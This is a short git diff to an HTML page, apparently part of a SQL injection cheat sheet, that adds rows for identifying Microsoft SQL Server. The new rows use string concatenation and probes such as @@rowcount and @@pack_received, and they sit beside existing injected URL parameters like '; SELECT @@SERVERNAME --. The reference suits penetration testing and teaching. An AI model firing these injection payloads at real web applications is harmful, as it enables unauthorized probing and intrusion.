diff --git a/dbmsIdentification/sqlserver.html b/dbmsIdentification/sqlserver.html
index ff0fa93..5bb7655 100644
--- a/dbmsIdentification/sqlserver.html
+++ b/dbmsIdentification/sqlserver.html
@@ -18,6 +18,16 @@
DBMS Identification
Default variable |
page.asp?id=sql'; SELECT @@SERVERNAME -- |
+
+ | String concatenation |
+ page.php?id='mssql'+'mssql' -- |
+
+
+ | Functions |
+ @@rowcount --
+ SQUARE(1) --
+ @@pack_received -- |
+
Error messages Note: Triggering DB errors through invalid syntax will sometimes return verbose error messages that include the DBMS name. |
page.asp?id=' |